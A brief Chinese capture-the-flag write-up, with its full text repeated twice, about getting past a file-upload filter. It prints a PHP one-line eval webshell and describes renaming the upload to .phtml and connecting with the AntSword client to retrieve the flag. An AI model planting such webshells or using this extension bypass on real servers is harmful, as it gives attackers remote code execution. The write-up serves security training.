是一个文件上传,随便上传一个,提示要上传照片格式,那么就上传一句话木马.jpg:
<?php @eval($_POST['123']); ?>
抓包修改后缀名,经过多次尝试,.phtml
成功连接蚁剑:
找到flag:
顺便看看过滤了哪些后缀:
总结:
.phtml的一句话木马上传绕过限制
是一个文件上传,随便上传一个,提示要上传照片格式,那么就上传一句话木马.jpg:
<?php @eval($_POST['123']); ?>
抓包修改后缀名,经过多次尝试,.phtml
成功连接蚁剑:
找到flag:
顺便看看过滤了哪些后缀:
总结:
.phtml的一句话木马上传绕过限制